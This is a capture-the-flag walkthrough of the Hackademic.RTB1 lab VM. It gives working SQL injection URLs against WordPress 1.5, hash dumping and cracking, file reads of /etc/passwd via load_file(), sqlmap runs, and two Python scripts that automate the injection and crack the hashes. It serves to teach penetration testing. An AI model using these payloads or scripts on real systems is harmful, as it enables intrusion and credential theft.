Hackademic.RTB1 walkthrough (Spoiler: do NOT read this before trying it yourself!!!)
From Sec-Track Wiki
== Network Mapping ==

Nmap ping sweep:

root@bt:~# nmap -sP 192.168.64.*

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-11-03 21:40 EDT
Nmap scan report for 192.168.64.1
Host is up (0.00027s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.64.2
Host is up (0.00021s latency).
MAC Address: 00:50:56:EB:02:8E (VMware)
Nmap scan report for 192.168.64.131
Host is up.
Nmap scan report for 192.168.64.134
Host is up (0.00050s latency).
MAC Address: 00:0C:29:01:8A:4D (VMware)
Nmap scan report for 192.168.64.254
Host is up (0.0011s latency).
MAC Address: 00:50:56:ED:26:45 (VMware)
Nmap done: 256 IP addresses (5 hosts up) scanned in 3.70 seconds

Five hosts answer. 192.168.64.1, .2 and .254 carry 00:50:56 MACs, the VMware host-side virtual adapters; .131 is listed without a MAC, which is how nmap reports the scanning machine itself; so the target is 192.168.64.134 (MAC 00:0C:29:01:8A:4D). Note that the target's address is not stable across this writeup: the early scans show .133/.134 and everything from the sqlmap section onward uses .137. The lab was revisited over several days and the VM presumably got a different DHCP lease each time, so substitute whatever address your own copy receives.
== Host Identification & Port Scanning ==

root@bt:~# nmap -sV 192.168.64.134

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-11-03 21:42 EDT
Nmap scan report for 192.168.64.133
Host is up (0.00053s latency).
Not shown: 998 filtered ports
PORT   STATE  SERVICE VERSION
22/tcp closed ssh
80/tcp open   http    Apache httpd 2.2.15 ((Fedora))
MAC Address: 00:0C:29:01:8A:4D (VMware)

root@bt:~# nmap -O 192.168.64.134

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-11-03 21:54 EDT
Nmap scan report for 192.168.64.134
Host is up (0.00041s latency).
Not shown: 998 filtered ports
PORT   STATE  SERVICE
22/tcp closed ssh
80/tcp open   http
MAC Address: 00:0C:29:01:8A:4D (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.22 (Fedora Core 6)
Network Distance: 1 hop

Only two ports are reachable: 22/tcp answers with a RST (closed, so nothing is listening there) and 80/tcp is open; the other 998 are filtered. The attack surface is therefore the Apache 2.2.15 instance. (The -sV output reports .133 although .134 was scanned; same MAC, same VM, different DHCP lease.) Treat the -O result as a guess: the TCP/IP fingerprint says "Linux 2.6.22 (Fedora Core 6)", whereas /etc/issue and uname, read later through the injection, show Fedora 12 on kernel 2.6.31.5, which is the version that matters when choosing the privilege-escalation exploit.
== Apache OPTIONS ==

root@bt:~# nc 192.168.64.134 80
OPTIONS / HTTP/1.0

HTTP/1.1 200 OK
Date: Thu, 03 Nov 2011 20:32:21 GMT
Server: Apache/2.2.15 (Fedora)
Allow: GET,HEAD,POST,OPTIONS,TRACE
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

TRACE is enabled (nikto flags it below as OSVDB-877, cross-site tracing). It plays no part in this compromise, but a hardened Apache should have TraceEnable off.
Source Code
<head profile="http://gmpg.org/xfn/11"> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta name="generator" content="WordPress 1.5.1.1" />
==
== WordPress multiple vulnerabilities ==

http://www.securityfocus.com/archive/1/401597/30/0/threaded

Gentoo Linux Security Advisory GLSA 200506-04
http://security.gentoo.org/

Severity: Normal
Title: Wordpress: Multiple vulnerabilities
Date: June 06, 2005
Bugs: #88926, #94512
ID: 200506-04

Synopsis
Wordpress contains SQL injection and XSS vulnerabilities.

Description
Due to a lack of input validation, WordPress is vulnerable to SQL injection and XSS attacks.

Impact
An attacker could use the SQL injection vulnerabilities to gain information from the database. Furthermore the cross-site scripting issues give an attacker the ability to inject and execute malicious script code or to steal cookie-based authentication credentials, potentially compromising the victim's browser.

WordPress 1.5.1.1 is in the affected range (the advisory calls for 1.5.1.3 or later), and the SQL injection it describes, reachable through the cat parameter of index.php, is what the rest of this walkthrough exploits.
== Basic analysis with nikto ==

root@bt:/pentest/web/nikto# perl nikto.pl -h 192.168.64.134

- Nikto v2.1.4
---------------------------------------------------------------------------
+ Target IP:          192.168.64.134
+ Target Hostname:    192.168.64.134
+ Target Port:        80
+ Start Time:         2011-11-04 22:16:51
---------------------------------------------------------------------------
+ Server: Apache/2.2.15 (Fedora)
+ Apache/2.2.15 appears to be outdated (current is at least Apache/2.2.17). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ ETag header found on server, inode: 12748, size: 1475, mtime: 0x4996d177f5c3b
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 6448 items checked: 1 error(s) and 6 item(s) reported on remote host
+ End Time:           2011-11-04 22:18:40 (109 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

A second run against the WordPress directory itself:

root@bt:/pentest/web/nikto# perl nikto.pl -h http://192.168.64.134/Hackademic_RTB1/

- Nikto v2.1.4
---------------------------------------------------------------------------
+ Target IP:          192.168.64.134
+ Target Hostname:    192.168.64.134
+ Target Port:        80
+ Start Time:         2011-11-05 13:04:24
---------------------------------------------------------------------------
+ Server: Apache/2.2.15 (Fedora)
+ Retrieved x-powered-by header: PHP/5.3.3
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.2.15 appears to be outdated (current is at least Apache/2.2.19). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ /index.php/\"><script><script>alert(document.cookie)</script><: eZ publish v3 and prior allow Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /xmlrpc.php: xmlrpc.php was found.
+ /readme.html: This WordPress file reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ 6456 items checked: 1 error(s) and 9 item(s) reported on remote host
+ End Time:           2011-11-05 13:05:37 (73 seconds)
---------------------------------------------------------------------------

Checking the reported paths by hand:

http://192.168.64.134/Hackademic_RTB1//index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 (the PHP credits easter egg; it only answers while expose_php is on)
http://192.168.64.134/Hackademic_RTB1/xmlrpc.php --> "XML-RPC server accepts POST requests only."
http://192.168.64.134/Hackademic_RTB1/readme.html
http://192.168.64.134/Hackademic_RTB1/license.txt

Useful take-aways: PHP 5.3.3 from the X-Powered-By header, the WordPress version confirmed by readme.html, and an exposed xmlrpc.php. The "eZ publish" XSS entry is a generic signature match, not a confirmed finding; nikto is a signature scanner and everything it reports needs manual verification before it goes into a report.
== SQL injection ==

Probing the index.php query-string parameters with a stray quote:

http://192.168.64.134/Hackademic_RTB1/?p='9   --> not vulnerable
http://192.168.64.134/Hackademic_RTB1/?cat='1 --> vulnerable

WordPress database error: [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\\'1 LIMIT 1' at line 1]
SELECT * FROM wp_categories WHERE cat_ID = \\\'1 LIMIT 1

Two things are visible in that error. The query is SELECT * FROM wp_categories WHERE cat_ID = <cat> LIMIT 1 with the parameter dropped in unquoted, so injecting in this numeric context needs no quote at all. And the quote we sent came back backslash-escaped: PHP escaped it before it reached MySQL (magic_quotes_gpc or addslashes()), which is why any string literal has to be written as a hex or char() literal later on.

Counting columns with ORDER BY:

http://192.168.64.134/Hackademic_RTB1/?cat=1 order by 1
http://192.168.64.134/Hackademic_RTB1/?cat=1 order by 2
http://192.168.64.134/Hackademic_RTB1/?cat=1 order by 3
http://192.168.64.134/Hackademic_RTB1/?cat=1 order by 4
http://192.168.64.134/Hackademic_RTB1/?cat=1 order by 5
http://192.168.64.134/Hackademic_RTB1/?cat=1 order by 6

Archive for the “WordPress database error: [Unknown column '6' in 'order clause'] SELECT * FROM wp_categories WHERE cat_ID = 1 order by 6 LIMIT 1” Category

1 through 5 render normally and 6 errors, so wp_categories has five columns.

UNION SELECT with five columns. With cat=1 the real row is returned first and the trailing LIMIT 1 hides the injected one, so cat=0 is used: the real query matches nothing and the injected row is the only one left.

http://192.168.64.134/Hackademic_RTB1/?cat=1 union select 1,2,3,4,5
http://192.168.64.134/Hackademic_RTB1/?cat=0 union select 1,2,3,4,5

Archive for the “2” Category

Column 2 is echoed in the page heading, so that is where the data goes.

Database version
http://192.168.64.134/Hackademic_RTB1/?cat=0 union select 1,version(),3,4,5
Archive for the “5.1.47” Category

Database user
http://192.168.64.134/Hackademic_RTB1/?cat=0 union select 1,user(),3,4,5
Archive for the “root@localhost” Category

Database name
http://192.168.64.134/Hackademic_RTB1/?cat=0 union select 1,database(),3,4,5
Archive for the “wordpress” Category

The application connects to MySQL as root. That single misconfiguration is what turns a data-disclosure bug into arbitrary file reads (the FILE privilege, confirmed in the sqlmap section) and eventually a full compromise.
WordPress database description: http://codex.wordpress.org/Database_Description

The codex page describes the schema of a much later WordPress release (wp_commentmeta, wp_comments, wp_links, wp_options, wp_postmeta, wp_posts, wp_terms, wp_term_relationships, wp_term_taxonomy, wp_usermeta, wp_users). The 1.5 schema on this box differs (sqlmap enumerates wp_categories, wp_post2cat, wp_linkcategories and a 22-column wp_users further down), but the three columns needed here, ID, user_login and user_pass, exist in both.

Table: wp_users (as documented in the codex)

Field                Type                 Null  Key  Default              Extra
ID                   bigint(20) unsigned        PRI  NULL                 auto_increment
user_login           varchar(60)                IND
user_pass            varchar(64)
user_nicename        varchar(50)                IND
user_email           varchar(100)
user_url             varchar(100)
user_registered      datetime                        0000-00-00 00:00:00
user_activation_key  varchar(60)
user_status          int(11)                         0
display_name         varchar(250)
Extracting users and password hashes

The injected query still ends in LIMIT 1, so each request returns a single row; pick the row with WHERE ID=n. concat(user_login,0x3a,user_pass) joins login and hash with a colon (0x3a) without needing a quoted string. The first request, without a WHERE, happened to return NickJames.

http://192.168.64.137/Hackademic_RTB1/?cat=0 union select 1,concat(user_login,0x3a,user_pass),3,4,5 from wp_users
Archive for the “NickJames:21232f297a57a5a743894a0e4a801fc3” Category

http://192.168.64.137/Hackademic_RTB1/?cat=0 union select 1,concat(user_login,0x3a,user_pass),3,4,5 from wp_users where ID=2
Archive for the “JohnSmith:b986448f0bb9e5e124ca91d3d650f52c” Category

http://192.168.64.137/Hackademic_RTB1/?cat=0 union select 1,concat(user_login,0x3a,user_pass),3,4,5 from wp_users where ID=3
Archive for the “GeorgeMiller:7cbb3252ba6b7e9c422fac5334d22054” Category

http://192.168.64.137/Hackademic_RTB1/?cat=0 union select 1,concat(user_login,0x3a,user_pass),3,4,5 from wp_users where ID=4
Archive for the “TonyBlack:a6e514f9486b83cb53d8d932f9a04292” Category

http://192.168.64.137/Hackademic_RTB1/?cat=0 union select 1,concat(user_login,0x3a,user_pass),3,4,5 from wp_users where ID=5
Archive for the “JasonKonnors:8601f6e1028a8e8a966f6c33fcd9aec4” Category

http://192.168.64.137/Hackademic_RTB1/?cat=0 union select 1,concat(user_login,0x3a,user_pass),3,4,5 from wp_users where ID=6
Archive for the “MaxBucky:50484c19f1afdaf3841a0d821ed393d2” Category

Password cracking

The hashes are 32 hex digits with no salt: WordPress 1.5 stored plain md5(password), so an online lookup table is all it takes:

http://www.hashchecker.de/hash.cgi?action=check&wert=1&hash=21232f297a57a5a743894a0e4a801fc3 etc...

NickJames:21232f297a57a5a743894a0e4a801fc3 > admin
JohnSmith:b986448f0bb9e5e124ca91d3d650f52c > PUPPIES
GeorgeMiller:7cbb3252ba6b7e9c422fac5334d22054 > q1w2e3
TonyBlack:a6e514f9486b83cb53d8d932f9a04292 > napoleon
JasonKonnors:8601f6e1028a8e8a966f6c33fcd9aec4 > maxwell
MaxBucky:50484c19f1afdaf3841a0d821ed393d2 > kernel
Other useful data and SQLi techniques

Reading files: /etc/passwd

http://192.168.64.137/Hackademic_RTB1/?cat=0 union select 1,load_file('/etc/passwd'),3,4,5

Archive for the “WordPress database error: [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\\'/etc/passwd\\\') ,3,4,5 LIMIT 1' at line 1]SELECT * FROM wp_categories WHERE cat_ID = 0 union select 1,load_file (\\\'/etc/passwd\\\'),3,4,5 LIMIT 1” Category

The quotes get escaped again, so the path has to be passed as a quote-free literal. MySQL accepts a hex literal (0x2f6574632f706173737764 is "/etc/passwd") or char(47,101,...); both yield the same string. load_file() additionally needs the FILE privilege, read access for the mysqld user (mysql, per my.cnf below) and no restrictive secure_file_priv; all three hold on this box.

Hex-encoded /etc/passwd:

http://192.168.64.137/Hackademic_RTB1/?cat=0 union select 1,load_file(0x2f6574632f706173737764),3,4,5

Archive for the “
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:499:virtual console memory owner:/dev:/sbin/nologin
avahi-autoipd:x:499:498:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
rtkit:x:498:494:RealtimeKit:/proc:/sbin/nologin
nscd:x:28:493:NSCD Daemon:/:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
avahi:x:497:492:avahi-daemon:/var/run/avahi-daemon:/sbin/nologin
haldaemon:x:68:491:HAL daemon:/:/sbin/nologin
openvpn:x:496:490:OpenVPN:/etc/openvpn:/sbin/nologin
apache:x:48:489:Apache:/var/www:/sbin/nologin
saslauth:x:495:488:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
mailnull:x:47:487::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:486::/var/spool/mqueue:/sbin/nologin
smolt:x:494:485:Smolt:/usr/share/smolt:/sbin/nologin
sshd:x:74:484:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
pulse:x:493:483:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
gdm:x:42:481::/var/lib/gdm:/sbin/nologin
p0wnbox.Team:x:500:500:p0wnbox.Team:/home/p0wnbox.Team:/bin/bash
mysql:x:27:480:MySQL Server:/var/lib/mysql:/bin/bash
” Category

Only root, the one ordinary user p0wnbox.Team (UID 500) and, unusually, mysql have a real shell.

Same thing with char():

http://192.168.64.137/Hackademic_RTB1/?cat=0 union select 1,load_file(char(47,101,116,99,47,112,97,115,115,119,100)),3,4,5
Archive for the “root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/ etc.........

/etc/group

http://192.168.64.137/Hackademic_RTB1/?cat=0 union select 1,load_file(0x2f6574632f67726f7570),3,4,5

Archive for the “
root:x:0:root
bin:x:1:root,bin,daemon
daemon:x:2:root,bin,daemon
sys:x:3:root,bin,adm
adm:x:4:root,adm,daemon
tty:x:5:
disk:x:6:root
lp:x:7:daemon,lp
mem:x:8:
kmem:x:9:
wheel:x:10:root
mail:x:12:mail
uucp:x:14:uucp
man:x:15:
games:x:20:
gopher:x:30:
video:x:39:
dip:x:40:
ftp:x:50:
lock:x:54:
audio:x:63:
nobody:x:99:
users:x:100:
floppy:x:19:
vcsa:x:499:
avahi-autoipd:x:498:
ntp:x:38:
utmp:x:22:
utempter:x:35:
slocate:x:21:
desktop_admin_r:x:497:
desktop_user_r:x:496:
dbus:x:81:
jackuser:x:495:
rtkit:x:494:
nscd:x:493:
tcpdump:x:72:
cdrom:x:11:
tape:x:33:
dialout:x:18:
avahi:x:492:
haldaemon:x:491:
openvpn:x:490:
apache:x:489:
saslauth:x:488:
mailnull:x:487:
smmsp:x:486:
smolt:x:485:
sshd:x:484:
pulse:x:483:
pulse-access:x:482:
gdm:x:481:
p0wnbox.Team:x:500:
mysql:x:480:
” Category

/etc/hosts

http://192.168.64.137/Hackademic_RTB1/?cat=0 union select 1,load_file(0x2f6574632f686f737473),3,4,5

Archive for the “
# hostname HackademicRTB1 added to /etc/hosts by anaconda
127.0.0.1   localhost.localdomain localhost HackademicRTB1
::1         localhost6.localdomain6 localhost6 HackademicRTB1
” Category

/etc/fstab

http://192.168.64.137/Hackademic_RTB1/?cat=0 union select 1,load_file(0x2f6574632f6673746162),3,4,5

Archive for the “
#
# /etc/fstab
# Created by anaconda on Fri Jan 7 18:39:43 2011
#
# Accessible filesystems, by reference, are maintained under '/dev/disk'
# See man pages fstab(5), findfs(8), mount(8) and/or blkid(8) for more info
#
/dev/mapper/vg_hackademicrtb1-lv_root /      ext4   defaults       1 1
UUID=860d7298-5bea-4d12-9370-b995fd2371c0 /boot ext4 defaults       1 2
/dev/mapper/vg_hackademicrtb1-lv_swap swap   swap   defaults       0 0
tmpfs                   /dev/shm   tmpfs   defaults        0 0
devpts                  /dev/pts   devpts  gid=5,mode=620  0 0
sysfs                   /sys       sysfs   defaults        0 0
proc                    /proc      proc    defaults        0 0
” Category

/etc/my.cnf

http://192.168.64.137/Hackademic_RTB1/?cat=0 union select 1,load_file(0x2f6574632f6d792e636e66),3,4,5

Archive for the “
[mysqld]
datadir=/var/lib/mysql
socket=/var/lib/mysql/mysql.sock
user=mysql
# Default to using old password format for compatibility with mysql 3.x
# clients (those using the mysqlclient10 compatibility package).
old_passwords=1

# Disabling symbolic-links is recommended to prevent assorted security risks;
# to do so, uncomment this line:
# symbolic-links=0

# To allow mysqld to connect to a MySQL Cluster management daemon, uncomment
# these lines and adjust the connectstring as needed.
#ndbcluster
#ndb-connectstring="nodeid=4;host=localhost:1186"

[mysqld_safe]
log-error=/var/log/mysqld.log
pid-file=/var/run/mysqld/mysqld.pid

[ndbd]
# If you are running a MySQL Cluster storage daemon (ndbd) on this machine,
# adjust its connection to the management daemon here.
# Note: ndbd init script requires this to include nodeid!
connect-string="nodeid=2;host=localhost:1186"

[ndb_mgm]
# connection string for MySQL Cluster management tool
connect-string="host=localhost:1186"
” Category

Two details in my.cnf matter later: old_passwords=1 means account hashes are stored in the weak 16-hex-digit pre-4.1 format, and there is no secure_file_priv line, so load_file() is not confined to a directory.
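The manual steps above (probing for escaped quotes, counting columns with ORDER BY, placing an expression in column 2 of the UNION, and encoding a path as a hex or char() literal so no quote is needed) are mechanical enough to script. The following is an added example and not code from the Sec-Track page; it runs entirely offline against a small stand-in endpoint, FakeCatEndpoint, that reproduces only what the page shows (the LIMIT 1 query, backslash-escaped quotes, five columns, column 2 echoed in the "Archive for the “…” Category" heading, and a few canned answers). The base URL, the paths and the canned /etc/passwd line are taken from the page; the endpoint and the "Uncategorized" category name are constructed for the demo.

```python
"""Offline helpers for the UNION-based injection in index.php?cat=.

Added example, not code from the Sec-Track page.  Nothing here touches the
network: FakeCatEndpoint stands in for the box and reproduces only what the
page shows (query ends in LIMIT 1, quotes arrive backslash-escaped, five
columns, column 2 lands in the "Archive for the “…” Category" heading).
"""
import re
import urllib.parse

BASE = "http://192.168.64.137/Hackademic_RTB1/"
ARCHIVE_RE = re.compile("Archive for the \u201c(.*?)\u201d Category", re.S)


def hex_literal(s):
    """MySQL hex literal for a string: '/etc/passwd' -> 0x2f6574632f706173737764.
    Needed because the quotes in load_file('/etc/passwd') reach MySQL escaped."""
    return "0x" + s.encode().hex()


def char_literal(s):
    """Same string as char(47,101,...), the other quote-free form."""
    return "char(" + ",".join(str(b) for b in s.encode()) + ")"


def union_payload(cols, slot, expr, suffix=""):
    """'0 union select 1,<expr>,3,...' with expr in 1-based column `slot`.
    cat=0 makes the real query match nothing, so LIMIT 1 keeps our row."""
    parts = [str(i) for i in range(1, cols + 1)]
    parts[slot - 1] = expr
    return "0 union select " + ",".join(parts) + (" " + suffix if suffix else "")


def cat_url(payload, base=BASE):
    """Full URL with the payload URL-encoded (spaces become %20)."""
    return base + "?cat=" + urllib.parse.quote(payload, safe="(),@")


def quotes_are_escaped(error_text):
    """True when the DB error echoes our quote as \\' (magic_quotes_gpc / addslashes)."""
    return "\\'" in error_text


def extract_marker(html):
    """Pull the injected value out of the category heading, or None."""
    m = ARCHIVE_RE.search(html)
    return m.group(1) if m else None


def find_column_count(probe, max_cols=20):
    """Largest n for which 'ORDER BY n' does not fail; probe(cat) -> response."""
    for n in range(1, max_cols + 1):
        if "Unknown column" in probe("1 order by %d" % n):
            return n - 1
    return None


def enumerate_with(probe):
    """The manual steps from the page, driven against any probe(cat) callable."""
    cols = find_column_count(probe)
    info = {"columns": cols, "quotes_escaped": quotes_are_escaped(probe("'1"))}
    for fn in ("version()", "user()", "database()"):
        info[fn] = extract_marker(probe(union_payload(cols, 2, fn)))
    passwd = union_payload(cols, 2, "load_file(%s)" % hex_literal("/etc/passwd"))
    info["/etc/passwd"] = extract_marker(probe(passwd))
    return info


class FakeCatEndpoint:
    """Stand-in for the vulnerable endpoint, constructed for this example."""
    COLUMNS = 5
    ANSWERS = {
        "version()": "5.1.47",
        "user()": "root@localhost",
        "database()": "wordpress",
        "load_file(0x2f6574632f706173737764)": "root:x:0:0:root:/root:/bin/bash",
    }

    def get(self, cat):
        cat = cat.replace("'", "\\'")  # what PHP's magic quotes did on the box
        sql = "SELECT * FROM wp_categories WHERE cat_ID = %s LIMIT 1" % cat
        if "\\'" in cat:
            return "WordPress database error: [You have an error in your SQL syntax] " + sql
        m = re.fullmatch(r"\d+ order by (\d+)", cat)
        if m:
            n = int(m.group(1))
            if n > self.COLUMNS:
                return "WordPress database error: [Unknown column '%d' in 'order clause'] %s" % (n, sql)
            return "Archive for the \u201cUncategorized\u201d Category"
        m = re.fullmatch(r"0 union select (.+)", cat)
        if m:
            cols = re.split(r",(?![^(]*\))", m.group(1))  # split on commas outside ( )
            if len(cols) != self.COLUMNS:
                return "WordPress database error: [The used SELECT statements have a different number of columns] " + sql
            return "Archive for the \u201c%s\u201d Category" % self.ANSWERS.get(cols[1], cols[1])
        return "Archive for the \u201cUncategorized\u201d Category"


if __name__ == "__main__":
    print(cat_url(union_payload(5, 2, "version()")))
    print(enumerate_with(FakeCatEndpoint().get))
```

To use it against a live copy of the VM, replace FakeCatEndpoint().get with a function that fetches cat_url(payload) and returns the response body; everything else stays the same.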
== Automating the work with sqlmap ==

Database banner

root@bt:~/hackademic01# python /pentest/database/sqlmap/sqlmap.py -u http://192.168.64.137/Hackademic_RTB1/?cat=1 -b
web server operating system: Linux Fedora 13 (Goddard)
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0
banner: '5.1.47'

Current user

root@bt:~/hackademic01# python /pentest/database/sqlmap/sqlmap.py -u http://192.168.64.137/Hackademic_RTB1/?cat=1 --current-user
[23:11:44] [INFO] retrieved: root@localhost
current user: 'root@localhost'

Current database

root@bt:~/hackademic01# python /pentest/database/sqlmap/sqlmap.py -u http://192.168.64.137/Hackademic_RTB1/?cat=1 --current-db
[23:13:26] [INFO] retrieved: wordpress
current database: 'wordpress'

Is the current user DBA?

root@bt:~/hackademic01# python /pentest/database/sqlmap/sqlmap.py -u http://192.168.64.137/Hackademic_RTB1/?cat=1 --is-dba
[23:14:11] [INFO] retrieved: 1
current user is DBA: 'True'

Enumerate users

root@bt:~/hackademic01# python /pentest/database/sqlmap/sqlmap.py -u http://192.168.64.137/Hackademic_RTB1/?cat=1 --users
[23:15:47] [INFO] retrieved: 'root'@'localhost'
database management system users [27]:
[*] 'root'@'localhost'

DB user password hash

root@bt:~/hackademic01# python /pentest/database/sqlmap/sqlmap.py -u http://192.168.64.137/Hackademic_RTB1/?cat=1 --passwords
[23:16:42] [INFO] retrieved: root
[23:16:42] [INFO] retrieved: 2eaec110380126d7

Cracking the password hash

root@bt:~/hackademic01# ./poc 2eaec110380126d7
mysql crack POC (c) 2006 Philippe Vigier & www.sqlhack.com
password for footprint 2eaec110380126d7 = 'lz5yedns'

2eaec110380126d7 is 16 hex digits, i.e. the pre-4.1 MySQL hash format that old_passwords=1 in /etc/my.cnf keeps in use; it is unsalted and cheap to brute-force offline. The recovered value is confirmed further down by DB_PASSWORD in wp-config.php.
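Both kinds of hash recovered so far (the unsalted MD5 values from wp_users and the 16-digit MySQL hash just cracked with the sqlhack.com tool) fall to a word list in no time, and it is worth seeing why. The following is an added example, not code from the Sec-Track page or from the tools it uses: mysql323() is a transcription of the pre-4.1 hash_password() routine from MySQL's sql/password.c, the hash values are the ones shown on the page, and the word list is constructed for the example (it deliberately contains the page's recovered passwords). wp15_cookie_pass() encodes what the author recalls of WordPress 1.5's wp_setcookie(), which double-hashes the password for the wordpresspass_* cookie; compare its output with the cookie shown in the phpinfo dump later on to confirm it for your copy.

```python
"""Dictionary check for the two hash formats pulled off the box.

Added example, not code from the Sec-Track page.  WordPress 1.5 stored
user_pass as unsalted md5(password); the 16-hex-digit MySQL hash is the
pre-4.1 format that old_passwords=1 in /etc/my.cnf keeps in use.  mysql323()
is a transcription of hash_password() from MySQL's sql/password.c; the hash
values come from the page, the word list is constructed for the example.
"""
import hashlib

WP_HASHES = {
    "NickJames": "21232f297a57a5a743894a0e4a801fc3",
    "JohnSmith": "b986448f0bb9e5e124ca91d3d650f52c",
    "GeorgeMiller": "7cbb3252ba6b7e9c422fac5334d22054",
    "TonyBlack": "a6e514f9486b83cb53d8d932f9a04292",
    "JasonKonnors": "8601f6e1028a8e8a966f6c33fcd9aec4",
    "MaxBucky": "50484c19f1afdaf3841a0d821ed393d2",
}
MYSQL_ROOT_HASH = "2eaec110380126d7"   # from sqlmap --passwords
WORDLIST = ["123456", "password", "admin", "PUPPIES", "q1w2e3", "napoleon",
            "maxwell", "kernel", "wordpress", "lz5yedns"]   # constructed


def md5_hex(password):
    return hashlib.md5(password.encode()).hexdigest()


def mysql323(password):
    """MySQL OLD_PASSWORD(): two 31-bit words; spaces and tabs are skipped.
    Pure integer arithmetic and no salt, so a word list runs through instantly."""
    nr, add, nr2 = 1345345333, 7, 0x12345671
    for b in password.encode("latin-1", "replace"):
        if b in (0x20, 0x09):
            continue
        nr ^= (((nr & 63) + add) * b) + (nr << 8)
        nr2 += (nr2 << 8) ^ nr
        add += b
        nr &= 0xFFFFFFFF          # emulate the C code's 32-bit unsigned wrap
        nr2 &= 0xFFFFFFFF
    return "%08x%08x" % (nr & 0x7FFFFFFF, nr2 & 0x7FFFFFFF)


def hash_type(h):
    """Classify by shape: WordPress 1.5 md5, MySQL pre-4.1, or MySQL 4.1+."""
    if len(h) == 32:
        return "md5"
    if len(h) == 16:
        return "mysql323"
    if len(h) == 41 and h.startswith("*"):
        return "mysql41"
    return "unknown"


def crack(hashes, wordlist, algo):
    """Return {hash: password} for every hash that some word reproduces.
    Hash the list once and look the targets up, not the other way round."""
    table = {algo(w): w for w in wordlist}
    return {h: table[h] for h in hashes if h in table}


def wp15_cookie_pass(stored_hash):
    """Value WordPress 1.5 puts in the wordpresspass_* cookie: md5(md5(pw)),
    i.e. md5 of the stored hash (from memory of wp_setcookie(); confirm
    against the cookie in the phpinfo dump on your own copy)."""
    return md5_hex(stored_hash)


def demo():
    """Crack both hash sets with the constructed list; returns (wp users, mysql root)."""
    wp = crack(WP_HASHES.values(), WORDLIST, md5_hex)
    my = crack([MYSQL_ROOT_HASH], WORDLIST, mysql323)
    return {u: wp.get(h) for u, h in WP_HASHES.items()}, my.get(MYSQL_ROOT_HASH)


if __name__ == "__main__":
    users, root_pw = demo()
    for user, pw in users.items():
        print("%-13s %s" % (user, pw or "(not in list)"))
    print("mysql root:", root_pw or "(not in list)")
    print("GeorgeMiller cookie value:", wp15_cookie_pass(WP_HASHES["GeorgeMiller"]))
```

The lesson is the one the box teaches: neither format has a salt or a work factor, so a leaked hash is as good as the password for anyone with a dictionary, and for WordPress 1.5 the hash alone is enough to build a valid login cookie.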
User privileges

root@bt:~/hackademic01# python /pentest/database/sqlmap/sqlmap.py -u http://192.168.64.137/Hackademic_RTB1/?cat=1 --privileges
database management system users privileges:
[*] 'root'@'localhost' (administrator) [27]:
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
    privilege: CREATE ROUTINE
    privilege: CREATE TEMPORARY TABLES
    privilege: CREATE USER
    privilege: CREATE VIEW
    privilege: DELETE
    privilege: DROP
    privilege: EVENT
    privilege: EXECUTE
    privilege: FILE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: RELOAD
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW DATABASES
    privilege: SHOW VIEW
    privilege: SHUTDOWN
    privilege: SUPER
    privilege: TRIGGER
    privilege: UPDATE

FILE is the one that matters here: it is what load_file() required, and the reason an injection in a blog can read /etc/passwd. A WordPress install needs only SELECT, INSERT, UPDATE and DELETE (plus CREATE/ALTER during upgrades) on its own database from a dedicated account; running it as MySQL root is the misconfiguration that makes everything below possible.
